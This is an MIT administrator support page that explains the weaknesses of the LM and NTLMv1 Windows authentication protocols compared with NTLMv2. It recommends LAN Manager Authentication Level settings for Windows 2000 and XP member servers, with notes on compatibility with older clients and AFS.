LM NTLM NTLMv2

When accessing resources on a Microsoft Windows 2000 or XP-based machine, the client provides credentials in the form of either Kerberos v5 tickets or a challenge/response authentication mechanism. The Kerberos tickets are used between Windows 2000 (and newer) machines within trusted domains. Stand-alone (non-domain) Windows 2000 machines, those in untrusted domains, and "downlevel" clients (Windows 95/98/NT and Unix-like OSes), however, must use challenge/response. Microsoft supports three types of challenge/response:
LAN Manager (LM)
NT LAN Manager (NTLM) version 1
NT LAN Manager (NTLM) version 2
LM is an old protocol and *very* easily attacked. NTLM is a significant improvement over LM, but is still relatively susceptible to attack. NTLM v2 adds several enhancements to v1 that make it much more secure.

LM

In LM authentication, the password is case-INsensitive, restricting each character to either a special character or one of the 26 letters. Additionally, long passwords (up to 14 characters) are divided into 7-character chunks. The combination of a small character space and password division result in a very small overall key space. Dictionary attacks on passwords used in LM authentication are very fast (case insensitive!) and even complete brute force attacks can be done in relatively little time.

NTLM

Recognizing this vulnerability, Microsoft introduced the NTLM protocol which simply adds case sensitivity and removes the password-division. Dictionary attacks on this protocol are still very good for weak passwords, but Microsoft claims that 100 2GHz machines would still take 5.5 years to obtain the password by brute force. Fortunately for attackers (unfortunately for you), the protocol doesn't offer any signing or encryption of the exchange of messages between the client and the server. Thus, the protocol is susceptible to message injection by an attacker, allowing "chosen plaintext" attacks.

NTLM v2

To further improve the challenge/response mechanism, Microsoft introduced NTLM v2. This protocol expands the key space to 128-bits, increasing the difficulty of exhaustive brute force attacks (according to Microsoft). The protocol also enables the establishment of a secure channel (signing and/or encryption) between the client and the server prior to the challenge/response. The secure channel is established using a key set created specifically for that purpose (ie, not the password-derived key) and effectively eliminates chosen-plaintext attacks. Encryption can also effectively obscure the messages, preventing the offline cracking attempts that work so well against LM and NTLM authentication.

The configuration of this authentication manifests itself in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\LMCompatibilityLevel registry key which can assume the following values:
0 - Send LM & NTLM responses
1 - Send LM & NTLM - use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only\refuse LM
5 - Send NTLMv2 response only\refuse LM & NTLM
While settings 0-2 are obvious, the distinction between the last three is less clear. In all of them (3-5), machines will only use NTLMv2 to outgoing authentication. With a value of 3, however, servers will accept all forms of incoming authentication, while they will deny LM with a value of 4, and both LM & NTLM with a value of 5.
Conveniently, this setting can also be configured through the group policy or local security MMC snap-ins under "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\LAN Manager Authentication Level" in Windows 2000 and "Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network Security: LAN Manager Authentication Level" in Windows XP.

Recommendations
Windows 2000 and XPLM should never, ever, ever be allowed as authentication to or from a member server. NTLM v2 should be required whenever possible (that is, whenever it doesn't break required functionality - see Special Cases below). To require NTLMv2 authentication from the member server and require at least NTLMv1 authentication to the member server:
Set the LAN Manager Authentication Level security option to "4 - Send NTLMv2 response only\refuse LM"
Special Cases
Mixed EnvironmentsNTLMv2 can be used by Windows NT 4 machines only with Service Pack 4 or higher installed. Similarly, it can only be used by Windows 95/98/Me machines that have the Directory Services Client installed (available on the Windows 2000 CD-ROM). With NTLMv2 required and LM/NTLM refused (level 5), the server will not be able to perform authentication on downlevel clients that don't meet the above criteria (Windows 2000 and XP machines work fine). With level 4, Windows NT4 machines should be able to successfully authenticate to the server even without SP4 (although 95/98/Me clients still require the DS Client). If communication with 95/98/Me or other LM-only machines is absolutely required, the setting can be reduced to "3 - Send NTLMv2 response only". This compatibility does come at the expense of security as detailed above.
AFS ClientThe AFS client used in the WIN.MIT.EDU domain currently does not support NTLMv2. Therefore, restricting outgoing authentication to NTLMv2 will result in an inability to obtain AFS tokens from the server. In most cases there's no need to access AFS from the server, but if your environment is an exception and this is required, you must reduce the NTLM level to "2 - Send NTLM response only". Again, this comes at the expense of security.

http://mit.edu/pismere/support/for-cont-admins/security-info/ntlm.html